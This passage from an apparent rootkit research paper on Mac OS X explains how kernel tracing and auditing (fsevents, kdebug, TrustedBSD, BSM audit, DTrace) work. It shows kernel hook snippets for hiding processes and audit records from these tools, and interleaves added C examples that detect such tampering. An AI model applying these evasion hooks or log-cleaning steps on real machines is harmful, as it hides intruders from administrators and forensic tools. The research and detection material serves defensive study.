The next diagram shows how the event is added:

open() -> open_nocancel() -> open1()    [bsd/vfs/vfs_syscalls.c]
                               |
                               v
[bsd/vfs/vfs_vnops.c]    vn_open_auth() -> vn_open_auth_do_create()
                                                    |
                                                    v
[bsd/vfs/vfs_fsevents.c]       add_fsevent() <- need_fsevent()

In this particular case we could hijack need_fsevent(), match the file we
want to hide and return 0 to avoid event generation. In many cases there
is a direct call to add_fsevent() so we also need to hijack it. Inside our
new function we need to retrieve the necessary information to match the
event we want to hide and return EINVAL or 0 in those cases. You should
study the add_fsevent() function to understand how to implement this. I
do not think there is much value in describing it here - there are more
(interesting) topics to cover.


------[ 6.2.2 - kdebug

kdebug is another (rather obscure) kernel trace facility used only by
Apple utils such as fs_usage and sc_usage. Documentation is poor and the
best references are those utils' source code and a few pages by Levin
[13]. The relevant include file is bsd/sys/kdebug.h. kdebug is implemented
in kernel functions that might produce relevant events using the
KERNEL_DEBUG() macro. The kernel functions involved (in that macro) are
kernel_debug() and kernel_debug_internal() (with the always inline
attribute).

A 32-bit integer is used for the debug messages, with the following
format:

 ----------------------------------------------------------------------
|              |               |                               |Func   |
| Class (8)    | SubClass (8)  |          Code (14)            |Qual(2)|
 ----------------------------------------------------------------------

For example, filesystem operations use class DBG_FSYSTEM (3) and
different subclasses to filter between different operations such as read
and writes to filesystem, vnode operations, HFS events, etc (consult
kdebug.h include).

Macros exist to encode the integer for each available class. Using BSD
class as an example:

#define KDBG_CODE(Class, SubClass, code) (((Class & 0xff) << 24) | \
    ((SubClass & 0xff) << 16) | ((code & 0x3fff)  << 2))
#define BSDDBG_CODE(SubClass, code) KDBG_CODE(DBG_BSD, SubClass, code)

Grep'ing XNU source code for BSDDBG_CODE will show where kdebug is
implemented in all BSD related functions. The fs_usage util traces
the file system related system calls (its source is located in
system_cmds-550.10 package). For example, it contains the following
code for open() syscall:

#define BSC_open                0x040C0014

If we look at kdebug's include we have the following Class and SubClass
codes:

#define DBG_BSD                 4
#define DBG_BSD_EXCP_SC         0x0C    /* System Calls */

Open is syscall #5 and it matches the code: (0x040C0014 & 0x3FFF) >>
2 = 0x5

Grep'ing for the DBG_BSD_EXCP_SC SubClass will land us into
bsd/dev/i386/systemcalls.c - the file that implements the C portion of
syscalls code. kdebug's tracing of syscalls entry and exit can be found
at unix_syscall64 using two macros that call kernel_debug():

(...)
KERNEL_DEBUG_CONSTANT_IST(KDEBUG_TRACE,
                BSDDBG_CODE(DBG_BSD_EXCP_SC, code) | DBG_FUNC_START,
                (int)(*ip), (int)(*(ip+1)), (int)(*(ip+2)),
                (int)(*(ip+3)), 0);
(...)
error = (*(callp->sy_call))((void *) p, uargp, &(uthread->uu_rval[0]));
(...)
KERNEL_DEBUG_CONSTANT_IST(KDEBUG_TRACE,
            BSDDBG_CODE(DBG_BSD_EXCP_SC, code) | DBG_FUNC_END,
            error, uthread->uu_rval[0], uthread->uu_rval[1], p->p_pid, 0);
(...)

The easiest way to disable tracing of BSD related functions (besides
patching kernel_debug to just return) is to modify the calls to
kernel_debug() and reroute them to our own function. The disassembler
makes this extremely easy, so much that I implemented code for each call
to kernel_debug() to have its own trampoline (there is really no need
for such thing!). Sample function to disable all BSD syscall traces:

void
tfc_kernel_debug(uint32_t debugid, uintptr_t arg1, uintptr_t arg2,
uintptr_t arg3, uintptr_t arg4, __unused uintptr_t arg5)
{
 // solve the symbol of the original function
 static void (*_kernel_debug)(uint32_t debugid, uintptr_t arg1,
 uintptr_t arg2, uintptr_t arg3, uintptr_t arg4,
 __unused uintptr_t arg5) = NULL;
 if (_kernel_debug == NULL)
  _kernel_debug = (void*)solve_kernel_symbol(&g_kernel_info,
  "_kernel_debug");

 // do not let fs_usage/sc_usage trace any BSD* system calls
 if ( (debugid >> 24) == DBG_BSD) return;
 else _kernel_debug(debugid, arg1, arg2, arg3, arg4, 0);
}

This patch will be suspicious when fs_usage and/or sc_usage are used
because no BSD system calls will be traced and there will be very little
screen output. kdebug's implementation makes it hard to distinguish
between the cases to hide and the ones to leave alone. Its buffers are
very small and this is easily noticed if you peek at fs_usage or sc_usage
code (verify the lookup() [bsd/vfs/vfs_lookup.c] kernel function to see
how fs_usage gets the path name for syscalls such as open()).

Fortunately for us there is an easy way to accomplish this using
current_proc() - it returns a proc structure for the currently executing
process. With this information we can retrieve the process name from
the proc structure (p_comm field, max size 16) and match against the
processes we do not want traced. A code snippet for a simple check to
hide vmware-tools-daemon:

struct proc *p = current_proc();
// MAXCOMLEN == 16, we could hash always to MAXCOMLEN to avoid strlen call
uint32_t hash = hash_name(&p->p_comm[0], strlen(&p->p_comm[0]));
static uint32_t hidehash = 0;
if (hidehash == 0) hidehash = hash_name("vmware-tools-daemon", MAXCOMLEN);
if (hash == hidehash ) return;
else _kernel_debug(debugid, arg1, arg2, arg3, arg4, 0);

The basic blocks to override kdebug are presented, implementation details
are left to the attached sample code and to you.

One final word of caution. The interception of Mach syscalls at kdebug
gives some problems and the hooking is very unstable (read kernel
panics). This is particularly exacerbated with the zombies rootkit
feature later described. The attached code has been written to support
that feature but at time of writing I still had no time to research the
Mach problem - the code just ignores that class.
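
Seen from the consumer side, the debugid layout and the observation that
a blanket DBG_BSD filter leaves a conspicuously empty trace translate into
a simple check. The following is an added example (not code from this
paper or from fs_usage): it decodes debugids per the diagram above and
flags a busy trace that contains no DBG_BSD events. The traces, the
min_events threshold and all kd_* names are constructed for illustration.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Values quoted in the text (bsd/sys/kdebug.h). */
#define DBG_FSYSTEM      3
#define DBG_BSD          4
#define DBG_BSD_EXCP_SC  0x0C
/* Function qualifiers (low two bits), as defined in bsd/sys/kdebug.h. */
#define DBG_FUNC_START   1
#define DBG_FUNC_END     2

/* Same layout as KDBG_CODE, with the qualifier OR'ed in. */
#define KD_ID(c, s, code, f) \
    ((((uint32_t)(c) & 0xff) << 24) | (((uint32_t)(s) & 0xff) << 16) | \
     (((uint32_t)(code) & 0x3fff) << 2) | ((uint32_t)(f) & 0x3))

struct kd_id { uint8_t cls, subcls; uint16_t code; uint8_t func; };

struct kd_report {
    unsigned total;            /* events seen */
    unsigned bsd_events;       /* events with class DBG_BSD */
    unsigned unmatched_start;  /* syscall entries with no exit (lost/in flight) */
    unsigned orphan_end;       /* syscall exits without a preceding entry */
    int      bsd_silent;       /* 1: busy trace with no DBG_BSD events at all */
};

/* Split a debugid into Class(8) | SubClass(8) | Code(14) | Func(2). */
static struct kd_id kd_decode(uint32_t debugid)
{
    struct kd_id d;
    d.cls    = (uint8_t)(debugid >> 24);
    d.subcls = (uint8_t)((debugid >> 16) & 0xff);
    d.code   = (uint16_t)((debugid >> 2) & 0x3fff);
    d.func   = (uint8_t)(debugid & 0x3);
    return d;
}

/* min_events: how many events must be seen before silence means anything. */
static struct kd_report kd_analyze(const uint32_t *ids, size_t n,
                                   unsigned min_events)
{
    static uint16_t open_calls[0x4000];  /* outstanding STARTs per code */
    struct kd_report r;
    size_t i;

    memset(&r, 0, sizeof r);
    memset(open_calls, 0, sizeof open_calls);
    for (i = 0; i < n; i++) {
        struct kd_id d = kd_decode(ids[i]);
        r.total++;
        if (d.cls != DBG_BSD)
            continue;
        r.bsd_events++;
        if (d.subcls != DBG_BSD_EXCP_SC)
            continue;
        if (d.func == DBG_FUNC_START) {
            open_calls[d.code]++;
        } else if (d.func == DBG_FUNC_END) {
            if (open_calls[d.code] > 0) open_calls[d.code]--;
            else r.orphan_end++;
        }
    }
    for (i = 0; i < 0x4000; i++)
        r.unmatched_start += open_calls[i];
    r.bsd_silent = (r.total >= min_events && r.bsd_events == 0);
    return r;
}

/* Constructed traces. FS subclass/code values and code 7 are made up. */
static const uint32_t TRACE_NORMAL[] = {
    KD_ID(DBG_FSYSTEM, 1, 2, 0),
    KD_ID(DBG_BSD, DBG_BSD_EXCP_SC, 5, DBG_FUNC_START),  /* open() entry */
    KD_ID(DBG_FSYSTEM, 1, 3, 0),
    KD_ID(DBG_BSD, DBG_BSD_EXCP_SC, 5, DBG_FUNC_END),    /* open() exit */
    KD_ID(DBG_BSD, DBG_BSD_EXCP_SC, 7, DBG_FUNC_START),  /* entry, no exit */
};
/* The same activity as seen when every DBG_BSD event is dropped. */
static const uint32_t TRACE_FILTERED[] = {
    KD_ID(DBG_FSYSTEM, 1, 2, 0),
    KD_ID(DBG_FSYSTEM, 1, 3, 0),
};

int main(void)
{
    struct kd_id d = kd_decode(0x040C0014);  /* BSC_open from fs_usage */
    struct kd_report a = kd_analyze(TRACE_NORMAL, 5, 2);
    struct kd_report b = kd_analyze(TRACE_FILTERED, 2, 2);

    printf("BSC_open: class=%u subclass=0x%02X code=%u func=%u\n",
           d.cls, d.subcls, d.code, d.func);
    printf("normal:   bsd=%u unmatched=%u silent=%d\n",
           a.bsd_events, a.unmatched_start, a.bsd_silent);
    printf("filtered: bsd=%u unmatched=%u silent=%d\n",
           b.bsd_events, b.unmatched_start, b.bsd_silent);
    return 0;
}
```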


------[ 6.2.3 - TrustedBSD

TrustedBSD is a project that started in FreeBSD and was ported to OS
X in Leopard. It enables a series of (interesting) security features,
the most famous one being the OS X/iOS sandbox. Its implementation is
done by adding "hooks" in critical kernel functions. Policy modules
can be written to receive events from these "hooks" and act on them
if necessary/desirable.

One easy application is to create a runtime file system checker for
critical folders. The app monitors LaunchDaemons and notifies the user if
a new file is added there, which is a not so frequent operation and
a favourite spot for malware to make itself persistent (oh, this was a
good opportunity to use APT buzzword!). It can also be used for evil
purposes - the same "hooks" can increase privileges or hide files [25].

Using an example with the open syscall (to be used later in the Kauth
section):

open() -> open_nocancel() -> open1()
                               |
                               v
                         vn_open_auth() -> vn_authorize_open_existing()
                                                    |
                                                    v
                                           mac_vnode_check_open()
                                                    |
                                                    v
                                                MAC_CHECK()
                                                    |
                                                    v
                                           call policy, if registered

The vnode check handler that we can install has the following prototype:

typedef int mpo_vnode_check_open_t(
        kauth_cred_t cred,
        struct vnode *vp,
        struct label *label,
        int acc_mode);

Our handler will receive a pointer to the vnode structure and make
it possible to dump the filename and even traverse the full path
(remember that vnodes exist in a linked list).

MAC_CHECK() is a macro that will route the request to the policy
modules. It is a bit like the sysent table, where there is a list called
mac_policy_list that holds function pointers. A presentation by Andrew
Case on Mac memory forensics [26] analyses how to find malicious
TrustedBSD modules using this list against a sample I created (rex
the wonder dog). It is worth checking his slides for other Mac memory
forensics tips.

The available policy checks can be found at bsd/security/mac_framework.h,
and their implementation is in the different source files in the same
folder. What interests us is that mac_* functions are always called so
there is a point of entry that can be used. The mac_* functions contain
all the necessary/available information since they are the ones always
calling and passing the parameters to the policy modules via MAC_CHECK()
macro.

To attack this we can use the same old story: hook those functions,
or attack the mac_policy_list using the syscall handler concept, or
something else. When loading the rootkit it might also be useful to
lookup the policy list to verify if there is anything else installed
other than default modules. The system owner might be a bit smarter than
the vast majority ;-).


------[ 6.2.4 - Auditing - Basic Security Module

The auditing features available from the Basic Security Module
Implementation are not really instrumentation but since their purpose is
to track user and process actions we should be interested in understanding
and tweaking them to our evil purposes.

Auditing is not fully enabled by default due to its (potentially)
considerable performance hit and disk space usage (oh, I miss those
PCI-DSS meetings). To modify its configuration you need to edit
/etc/security/audit_control. The two interesting fields are flags and
naflags (flags for events that can be matched to a user, naflags for
those who can't). Event classes are defined in /etc/security/audit_class
(description can be found at [27] and [28]). For example, if "pc" class
is configured audit will log exec() and its arguments.

Let's move to what really matters for us, evil stuff! Auditing is
implemented with macros [bsd/security/audit/audit.h] inside BSD and
Mach system calls (and some other places). The following code snippet
is from unix_syscall64 implementation, where entry and exit macros are
placed before the syscall function to be executed is called:

AUDIT_SYSCALL_ENTER(code, p, uthread);
error = (*(callp->sy_call))((void *) p, uargp, &(uthread->uu_rval[0]));
AUDIT_SYSCALL_EXIT(code, p, uthread, error);

About the contents of entry macro:

/*
 * audit_syscall_enter() is called on entry to each system call. It is
 * responsible for deciding whether or not to audit the call
 * (preselection), and if so, allocating a per-thread audit record.
 * audit_new() will fill in basic thread/credential properties.
 */

The exit macro is the interesting one because it calls
audit_syscall_exit():

/*
 * audit_syscall_exit() is called from the return of every system call, or
 * in the event of exit1(), during the execution of exit1(). It is
 * responsible for committing the audit record, if any, along with return
 * condition.
 */

When committed, the audit record will be added to an audit queue and
removed from the user thread structure (struct uthread, field uu_ar
[bsd/sys/user.h]).

void
audit_syscall_exit(unsigned int code, int error, __unused proc_t proc,
    struct uthread *uthread) {
(...)
        audit_commit(uthread->uu_ar, error, retval);
out:
        uthread->uu_ar = NULL;
}

The commit function:

void audit_commit(struct kaudit_record *ar, int error, int retval) {
(..)
        TAILQ_INSERT_TAIL(&audit_q, ar, k_q); // add to queue
        audit_q_len++;
        audit_pre_q_len--;
        cv_signal(&audit_worker_cv); // signal worker who commits to disk
        mtx_unlock(&audit_mtx);
}

By default in OS X, almost everything is disabled except logging
and authentication to obtain higher privileges. The command "praudit
/dev/auditpipe" (as root, of course) can be used to watch audit events
live. Run the command and log in via ssh, or lock and unlock the console
to see these events.

Syscall exit or audit commit functions can be temporarily patched to
test if they are the right places, and yes they are. Removing the call
to audit_commit() or patching it with a ret removes any trace of audit
events in logs. There are four references to commit in OS X 10.8.2
(3 calls, 1 jump):

- audit_syscall_exit
- audit_mach_syscall_exit
- audit_proc_coredump
- audit_session_event

To have granular control over the auditing process is a bit more
complicated. There is not always enough information available to
distinguish between the cases we want to hide at audit_commit(). For
example, if process auditing is enabled, the fork1() function calls
audit like this: AUDIT_ARG(pid, child_proc->p_pid);

This will call the function responsible to set the audit record field:

void audit_arg_pid(struct kaudit_record *ar, pid_t pid)
{
    ar->k_ar.ar_arg_pid = pid;
    ARG_SET_VALID(ar, ARG_PID);
}

The problem here is that we do not have (yet) enough information about
this fork; we are not sure (yet) if it is the process we want to hide or
some other process. A different tactic must be used! Because there is
an events queue we can hijack the worker responsible for those commits
to disk, audit_worker() [bsd/security/audit/audit_worker.c].

The missing piece is how to correlate all events we are interested
in. Luckily for us (and the auditor in particular) there is a session
id in audit record structure [bsd/security/audit/audit_private.h]:

pid_t  ar_subj_asid; /* Audit session ID */

With this information we just need to hold the queue commit to disk until
enough information to find the correct session ID is available. When we
have it we can edit the queue and remove all the entries that match that
session ID.

Last but not least, there is a critical task left! Auditing logs must be
cleaned in case auditing was already properly configured. The bad news
is that you will have to do this dirty work yourself. Do not forget that
the logs are in binary format and OpenBSM's source at [29] can be helpful
(praudit outputs XML format so it might be a good starting point).


------[ 6.2.5 - DTrace

DTrace is a fantastic dynamic tracing framework introduced by Sun in
Solaris and available in Mac OS X since Leopard. It can be used to trace
in real-time almost every corner of kernel and user processes with minimum
performance impact. An experienced system administrator can use its
power to assist in discovering strange (aka malicious) behaviour. There
are different providers that can trace almost every function entry and
exit, BSD syscalls and Mach traps, specific process, virtual memory, and
so on. The two most powerful providers against rootkits are syscall and
fbt (function boundary). We will see how they are implemented and how to
modify them to hide rootkit activity. A good design and implementation
overview is provided by [23] (Google is your friend) and usage guide at
[24].


------[ 6.2.5.1 - syscall provider

This provider allows tracing of every BSD system call entry and return
(the provider for Mach traps is mach_trap). A quick example that prints
the path argument being passed to the open() syscall:

# dtrace -n 'syscall::open:entry
{
    printf("opening %s", copyinstr(arg0));
}'
dtrace: description 'syscall::open:entry' matched 1 probe
CPU     ID                    FUNCTION:NAME
  0    119                       open:entry opening /dev/dtracehelper
  0    119                       open:entry opening
/usr/share/terminfo/78/xterm-256color
  0    119                       open:entry opening /dev/tty
  0    119                       open:entry opening /etc/pf.conf

The syscall provider is useful to detect syscall handler manipulation
but not modification of the function pointers in the sysent table. To
understand why, let's delve into its implementation.

This provider is implemented by rewriting the system call table when
a probe is enabled, which in practice is the same operation as sysent
hooking. The interesting source file is bsd/dev/dtrace/systrace.c. It
contains a global pointer called systrace_sysent - a DTrace related
structure that will hold the original system call pointer and some
other info.

Things start happening at systrace_provide(). Here systrace_sysent is
allocated and all necessary information copied from the original sysent
table (systrace_init). Then internal DTrace probe information is added.

DTrace's philosophy is of zero probe effect when disabled so there are
functions that replace and restore the sysent table entries. There is a
struct called dtrace_pops_t which contains provider's operations. Syscall
provider has the following:

static dtrace_pops_t systrace_pops = {
        systrace_provide,
        NULL,
        systrace_enable,
        systrace_disable,
        NULL,
        NULL,
        NULL,
        systrace_getarg,
        NULL,
        systrace_destroy
};

systrace_enable() will modify sysent function pointers and redirect them
to dtrace_systrace_syscall(). Code snippet responsible for this:

(...)
 lck_mtx_lock(&dtrace_systrace_lock);
 if (sysent[sysnum].sy_callc == systrace_sysent[sysnum].stsy_underlying)
 {
    vm_offset_t dss = (vm_offset_t)&dtrace_systrace_syscall;
    ml_nofault_copy((vm_offset_t)&dss,
(vm_offset_t)&sysent[sysnum].sy_callc, sizeof(vm_offset_t));
 }
 lck_mtx_unlock(&dtrace_systrace_lock);
(...)

Attaching a kernel debugger and inserting a breakpoint on
systrace_enable() confirms this (keep in mind all these values include
ASLR slide of 0x24a00000):

Before:

gdb$ print *(struct sysent*)(0xffffff8025255840+5*sizeof(struct sysent))
$12 = {
  sy_narg = 0x3,
  sy_resv = 0x0,
  sy_flags = 0x0,
  sy_call = 0xffffff8024cfc210,          <- open syscall, sysent[5]
  sy_arg_munge32 = 0xffffff8024fe34f0,
  sy_arg_munge64 = 0,
  sy_return_type = 0x1,
  sy_arg_bytes = 0xc
}

dtrace_systrace_syscall is located at address 0xFFFFFF8024FDC630.

After enabling a 'syscall::open:entry' probe:

gdb$ print *(struct sysent*)(0xffffff8025255840+5*sizeof(struct sysent))
$13 = {
  sy_narg = 0x3,
  sy_resv = 0x0,
  sy_flags = 0x0,
  sy_call = 0xffffff8024fdc630,    <- now points to dtrace_systrace_syscall
  sy_arg_munge32 = 0xffffff8024fe34f0,
  sy_arg_munge64 = 0,
  sy_return_type = 0x1,
  sy_arg_bytes = 0xc
}

To recall DTrace's flow:
  User                          Kernel
open() -|-> unix_syscall64() -> dtrace_systrace_syscall -> open() syscall

What are the conclusions from all this? If only the sysent table function
pointers are modified by the rootkit, DTrace will be unable to directly
detect the rootkit using the syscall provider. The modified pointer will
be copied by DTrace and DTrace will return to it. DTrace is blind to the
original function because it does not exist anymore in the table, only
inside our modified version.

If we modify the syscall handler as described in 2.6 and do not update
the sysent references in DTrace related functions then DTrace usage will
signal the potential presence of a rootkit. DTrace is still referencing
the original sysent table and will modify it, but the syscall handler is
no longer using that table. The result is that the DTrace syscall provider
will never receive any event. Conclusion: don't forget to fix those
references, although the functions that need to be patched are all static.
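
For an integrity checker the same facts mean that a sysent pointer equal
to dtrace_systrace_syscall is only legitimate if the pointer DTrace saved
in stsy_underlying is the expected handler. The following is an added
example (not code from this paper or from XNU) that classifies entries on
that basis; the open, getdirentries64 and dtrace_systrace_syscall
addresses are the ones from the gdb sessions in this paper, while the hook
address, the entry_view structure and the idea of a baseline taken from
trusted kernel symbols plus the ASLR slide are assumptions.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

enum verdict {
    ENTRY_OK,                  /* sy_call matches the trusted baseline */
    ENTRY_DTRACE_OK,           /* rewritten by systrace_enable(), original kept */
    ENTRY_HOOKED,              /* sy_call points somewhere unexpected */
    ENTRY_HOOKED_UNDER_DTRACE  /* DTrace saved an already-modified pointer */
};

/* One sysent slot as a memory-analysis tool would collect it (hypothetical). */
struct entry_view {
    const char *name;
    uint64_t sy_call;          /* current pointer in sysent[n] */
    uint64_t stsy_underlying;  /* pointer saved in systrace_sysent[n] */
    uint64_t baseline;         /* expected handler: symbol address + slide */
};

static enum verdict classify_entry(const struct entry_view *e,
                                   uint64_t systrace_fn)
{
    /*
     * systrace_enable() only rewrites a slot whose current pointer equals
     * the saved one, so the saved pointer tells us what DTrace returns to.
     */
    if (e->sy_call == systrace_fn)
        return e->stsy_underlying == e->baseline ? ENTRY_DTRACE_OK
                                                 : ENTRY_HOOKED_UNDER_DTRACE;
    return e->sy_call == e->baseline ? ENTRY_OK : ENTRY_HOOKED;
}

static size_t count_suspicious(const struct entry_view *tab, size_t n,
                               uint64_t systrace_fn)
{
    size_t i, bad = 0;
    for (i = 0; i < n; i++) {
        enum verdict v = classify_entry(&tab[i], systrace_fn);
        if (v == ENTRY_HOOKED || v == ENTRY_HOOKED_UNDER_DTRACE)
            bad++;
    }
    return bad;
}

/* Addresses from the gdb sessions in the text (they include the slide). */
#define DTRACE_SYSTRACE_SYSCALL 0xffffff8024fdc630ULL
#define OPEN_ADDR               0xffffff8024cfc210ULL
#define GETDIRENTRIES64_ADDR    0xffffff8024d01c20ULL
/* Constructed address standing in for a handler outside the kernel image. */
#define CONSTRUCTED_HOOK        0xffffff7fa5c01000ULL

static const struct entry_view SAMPLE[] = {
    { "open, no probe",
      OPEN_ADDR, OPEN_ADDR, OPEN_ADDR },
    { "open, syscall::open:entry enabled",
      DTRACE_SYSTRACE_SYSCALL, OPEN_ADDR, OPEN_ADDR },
    { "getdirentries64, pointer replaced",
      CONSTRUCTED_HOOK, CONSTRUCTED_HOOK, GETDIRENTRIES64_ADDR },
    { "getdirentries64, replaced and then probed",
      DTRACE_SYSTRACE_SYSCALL, CONSTRUCTED_HOOK, GETDIRENTRIES64_ADDR },
};

int main(void)
{
    static const char *const label[] = {
        "ok", "ok (DTrace probe)", "HOOKED", "HOOKED (hidden behind DTrace)"
    };
    size_t i;

    for (i = 0; i < sizeof SAMPLE / sizeof SAMPLE[0]; i++)
        printf("%-44s %s\n", SAMPLE[i].name,
               label[classify_entry(&SAMPLE[i], DTRACE_SYSTRACE_SYSCALL)]);
    printf("suspicious entries: %zu\n",
           count_suspicious(SAMPLE, 4, DTRACE_SYSTRACE_SYSCALL));
    return 0;
}
```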


------[ 6.2.5.2 - fbt provider

fbt stands for function boundary tracing and allows tracing function entry
and exit of almost all kernel related functions (there is a small list of
untraceable functions called critical_blacklist [bsd/dev/i386/fbt_x86.c]).

The possibilities to detect malicious code using this provider are higher
due to its design and implementation. An example using rubilyn rootkit
is the best way to demonstrate this:

#dtrace -s /dev/stdin -c "ls /"
fbt:::entry
/pid == $target/
{
}
^D

Searching output for getdirentries64, without rootkit:

  0  99661             unix_syscall64:entry
  0  97082  kauth_cred_uthread_update:entry
  0  91985            getdirentries64:entry
  0  92677        vfs_context_current:entry

Now with rootkit loaded:

  0  99661             unix_syscall64:entry
  0  97082  kauth_cred_uthread_update:entry
  0   2119        new_getdirentries64:entry  <- hooked syscall!!!
  0  91985            getdirentries64:entry  <- original function
  0  92677        vfs_context_current:entry

A very simple trace is able to detect both the hooked syscall and the
call to original getdirentries64. Houston, we have a rootkit problem!
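
The comparison just made by eye can be automated. The following is an
added example (not code from this paper or from DTrace): it parses the
"CPU ID FUNCTION:NAME" lines of two fbt traces and reports the probes that
appear in the observed trace but not in the baseline, using a longest
common subsequence. The trace lines are the ones printed above; the
function names and size limits are assumptions of the example.

```c
#include <stdio.h>
#include <string.h>

#define MAX_EV  64   /* maximum trace lines handled by this example */
#define NAME_SZ 64

/* Extract the function name from one "CPU ID FUNCTION:NAME" output line. */
static int parse_probe(const char *line, char *out)
{
    char tok[NAME_SZ];
    char *colon;

    if (sscanf(line, "%*d %*d %63s", tok) != 1)
        return -1;
    colon = strchr(tok, ':');
    if (colon == NULL)
        return -1;
    *colon = '\0';               /* drop ":entry" / ":return" */
    strcpy(out, tok);
    return 0;
}

static int parse_trace(const char *const *lines, int n, char names[][NAME_SZ])
{
    int i, k = 0;
    for (i = 0; i < n && k < MAX_EV; i++)
        if (parse_probe(lines[i], names[k]) == 0)
            k++;
    return k;
}

/*
 * Return the k-th probe (0-based) present in the observed trace but not
 * matched in the baseline, or NULL if there are fewer than k+1 of them.
 */
static const char *unexpected_probe(const char *const *base_lines, int nb,
                                    const char *const *obs_lines, int no,
                                    int k)
{
    static char base[MAX_EV][NAME_SZ], obs[MAX_EV][NAME_SZ];
    static int lcs[MAX_EV + 1][MAX_EV + 1];
    int i, j, seen = 0;

    nb = parse_trace(base_lines, nb, base);
    no = parse_trace(obs_lines, no, obs);

    /* lcs[i][j] = length of the LCS of base[i..] and obs[j..] */
    for (i = nb; i >= 0; i--)
        for (j = no; j >= 0; j--) {
            if (i == nb || j == no)
                lcs[i][j] = 0;
            else if (strcmp(base[i], obs[j]) == 0)
                lcs[i][j] = lcs[i + 1][j + 1] + 1;
            else
                lcs[i][j] = lcs[i + 1][j] > lcs[i][j + 1] ? lcs[i + 1][j]
                                                          : lcs[i][j + 1];
        }

    /* Walk both traces; whatever is not part of the LCS is a difference. */
    i = j = 0;
    while (j < no) {
        if (i < nb && strcmp(base[i], obs[j]) == 0) {
            i++; j++;
        } else if (i < nb && lcs[i + 1][j] >= lcs[i][j + 1]) {
            i++;                 /* baseline call missing from observed */
        } else {
            if (seen++ == k)
                return obs[j];   /* call that the baseline does not have */
            j++;
        }
    }
    return NULL;
}

/* The two traces shown above, copied as printed by dtrace. */
static const char *const CLEAN_TRACE[] = {
    "  0  99661             unix_syscall64:entry",
    "  0  97082  kauth_cred_uthread_update:entry",
    "  0  91985            getdirentries64:entry",
    "  0  92677        vfs_context_current:entry",
};
static const char *const HOOKED_TRACE[] = {
    "  0  99661             unix_syscall64:entry",
    "  0  97082  kauth_cred_uthread_update:entry",
    "  0   2119        new_getdirentries64:entry  <- hooked syscall!!!",
    "  0  91985            getdirentries64:entry  <- original function",
    "  0  92677        vfs_context_current:entry",
};

int main(void)
{
    const char *p;
    int k;

    for (k = 0; (p = unexpected_probe(CLEAN_TRACE, 4, HOOKED_TRACE, 5, k)); k++)
        printf("not in baseline: %s\n", p);
    return 0;
}
```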

DTrace's fbt design and implementation are very interesting so let me
"briefly" go thru it to find a way to hide the rootkit.

fbt's design is explained in [23]:

"On x86, FBT uses a trap-based mechanism that replaces one of the
instructions in the sequence that establishes a stack frame (or one of
the instructions in the sequence that dismantles a stack frame) with an
instruction to transfer control to the interrupt descriptor table (IDT).
The IDT handler uses the trapping instruction pointer to look up the FBT
probe and transfers control into DTrace. Upon return from DTrace, the
replaced instruction is emulated from the trap handler by manipulating
the trap stack."

The source files we should focus on are bsd/dev/i386/fbt_x86.c and
bsd/dev/dtrace/fbt.c.

DTrace's OS X implementation is done using an illegal instruction opcode,
which is (usually) patched into the instruction that sets the base pointer
(EBP/RBP). The instruction is emulated inside DTrace and not re-executed
as it happens in debuggers using int3 breakpoints.

Memory dump example with getdirentries64:

Before activating the provider:

gdb$ x/10i 0xFFFFFF8024D01C20
0xffffff8024d01c20:  55                            push   rbp
0xffffff8024d01c21:  48 89 e5                      mov    rbp,rsp
0xffffff8024d01c24:  41 56                         push   r14
0xffffff8024d01c26:  53                            push   rbx

After:

# dtrace -n fbt::getdirentries64:entry

gdb$ x/10i 0xFFFFFF8024D01C20
0xffffff8024d01c20:  55                         push   rbp
0xffffff8024d01c21:  f0 89 e5                   lock mov ebp,esp <- patched
0xffffff8024d01c24:  41 56                      push   r14
0xffffff8024d01c26:  53                         push   rbx

The function that does all the work to find the patch location is
__provide_probe_64() [bsd/dev/i386/fbt_x86.c] (FBT_PATCHVAL defines the
illegal opcode byte).

Patching is done at fbt_enable() [bsd/dev/dtrace/fbt.c]:

if (fbt->fbtp_currentval != fbt->fbtp_patchval)
{
    (void)ml_nofault_copy((vm_offset_t)&fbt->fbtp_patchval,
(vm_offset_t)fbt->fbtp_patchpoint, sizeof(fbt->fbtp_patchval));

    fbt->fbtp_currentval = fbt->fbtp_patchval;
    ctl->mod_nenabled++;
}

The following diagram shows the trap handling of the illegal instruction:

Activate fbt Provider
       |
       v
  fbt_enable()
       |
       v
Invalid instruction
   exception
-------|-----------[ osfmk/x86_64/idt64.s ]
       v
  idt64_invop()
       |
       v
 hndl_alltraps()
       |
       v
trap_from_kernel()
-------|-----------[ osfmk/i386/trap.c ]
       v
  kernel_trap()
-------|-----------[ bsd/dev/i386/fbt_x86.c ]
       v
fbt_perfCallback()             (...)                    .-> emulate ->
-------|-----------[ bsd/dev/dtrace/dtrace_subr.c ]     | continue
       v                                                | instruction
  dtrace_invop()                                        |
-------|-----------[ bsd/dev/i386/fbt_x86.c ]           |
       v                                                |
   fbt_invop()                                          |
-------|-----------[ bsd/dev/dtrace/dtrace.c ]          |
       v                                                |
  dtrace_probe()                                        |
       |                                                |
       v                                                |
__dtrace_probe()                                        |
       |                                                |
       v                                                |
     (...) ---------------------------------------------

DTrace is activated inside kernel_trap():

#if CONFIG_DTRACE
    if (__improbable(tempDTraceTrapHook != NULL)) {
        if (tempDTraceTrapHook(type, state, lo_spp, 0) == KERN_SUCCESS) {
            /*
             * If it succeeds, we are done...
             */
            return;
        }
    }
#endif /* CONFIG_DTRACE */

tempDTraceTrapHook is just a function pointer, which in the fbt provider
case points to fbt_perfCallback [bsd/dev/i386/fbt_x86.c]. The latter
is responsible for calling the DTrace functionality and emulating the
patched instruction. The emulation depends on the type of patch that
was made - prologue (entry) or epilogue (return), and which instruction
was patched. These can be:

- MOV RSP, RBP
- POP RBP
- LEAVE
- Also NOPs used by the sdt provider (statically defined tracing)

This information is stored inside DTrace internal structures and returned
by the call to dtrace_invop():

emul = dtrace_invop(saved_state->isf.rip, (uintptr_t *)saved_state,
saved_state->rax);

It is not possible to just patch this call because the emul value
determines the type of emulation that needs to be executed after.

dtrace_invop is used by fbt and sdt providers and does nothing more than
calling function pointers contained in dtrace_invop_hdlr linked list
[bsd/dev/dtrace/dtrace_subr.c].

Continuing through the diagram...

fbt_invop is a good candidate to hijack and hide whatever we want from
DTrace. This can be done via a trampoline or modifying the function
pointer contained in dtrace_invop_hdlr list (symbol available in kernel).
From what I could test this list is initialised with the pointer to
fbt_invop() before any calls are made to fbt provider. In principle we
can modify it without waiting for initial DTrace execution.

